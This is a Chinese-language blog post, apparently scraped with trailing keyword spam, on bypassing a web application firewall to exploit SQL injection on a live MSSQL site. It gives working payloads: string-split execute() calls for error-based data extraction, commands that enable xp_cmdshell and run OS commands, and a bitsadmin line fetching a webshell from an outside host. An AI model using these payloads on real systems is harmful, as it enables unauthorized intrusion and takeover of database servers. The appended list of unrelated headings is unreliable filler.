MSSQL WAF绕过(2)
发表于:2025-01-22 作者:千家信息网编辑
千家信息网最后更新 2025年01月22日,0x00 前言上次的绕过太简单,也没有能注出数据或者获取权限,这次继续绕过,获取数据0x01 过程还是上次的站点,简单的判断,存在注入发现and 数字、exec、union select、 selec
千家信息网最后更新 2025年01月22日MSSQL WAF绕过(2)
0x00 前言
上次的绕过太简单,也没有能注出数据或者获取权限,这次继续绕过,获取数据
0x01 过程
还是上次的站点,简单的判断,存在注入
发现and 数字、exec、union select、 select 数字。。。被过滤
发现execute函数没被过滤,狗没出来说明这个函数能用
execute('sql语句') //execute函数中可以写sql语句,且为字符串,那么就可以传入一些变形字符串来绕过waf
本地验证一下
一些变形
只是本次使用sql server堆叠注入,并不会将数据展示在页面,所以要让这一次的堆叠出错,达到报错注入的效果
execute('select convert(int,@@version)') --a
当然需要变形一下,不然会被拦截,因为出现了select
execute('sel'%2b'ect convert(int,@@version)') --a //在url编码中 %2b 等价与 + 所以可以理解为 'sel' + 'ect'
通过execute函数,可进行变形导致waf无法拦截,获取数据或执行sql语句就变得简单多了
执行cmdshell,由于cmdshell不能通过报错回显,但是可以将结果重定向到文件中或写入表中
execute('master..xp_cmdshell whoami > e:\'%2b'\xx\'%2b'\1.txt') // 双斜杠被过滤
返回报错并没有关系,waf没有拦截,查看1.txt是否有数据
0x02 后续
本来想写入webshell或通过公网下载webshell,但服务器不能出外网,且有waf,导致写shell失败,考虑后想kill掉waf,但还是避免对服务器造成影响。。
0x03 其他
附上其他在这次测试中用到的命令
execute('sp_configure "show advanced options",1')execute('reconfigure')execute('sp_configure "xp_cmdshell", 1')execute('reconfigure') //上述四步,使xp_cmdshell开启execute('master..xp_cmdshell "bitsadmin /transfer n http://xxxxx/1.aspx c:\\路径\\123.aspx"') //从公网下载webshell,本文中因机器不能出外网导致下载失败
数据
函数
语句
字符
字符串
数字
服务器
还是
公网
服务
中用
前言
只是
命令
效果
文件
斜杠
机器
权限
站点
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
u8怎么在数据库删除基础数据
利于个人网络安全的具体意见
苹果手机移至app数据库
无线网络技术教程第3版
德国网络安全性
数据库中指定数据文件大小
工控安全与网络安全的区别
江西软件开发代理商产品介绍
软件开发工程师个人简介重点
成都的软件开发强不
计算机网络技术笔记本电脑软件
网络安全相关法规近三年
双子星服务器怎么装系统
物联网七大网络安全
维度互联网科技有限公司
服务器映射软件
服务器io
网易我的世界服务器管理条约
前海有益互联网科技
软件开发网络培训
电信服务器怎么换成河南虚拟主机
Word软件开发模型
计算机网络技术实验三
丹东互助盘软件开发价格
数据库原理技术MySQL
治超站终端服务器
青岛电子计算机网络技术
软件开发转让
安徽飞运互联网科技有限公司
cydia一直数据库错误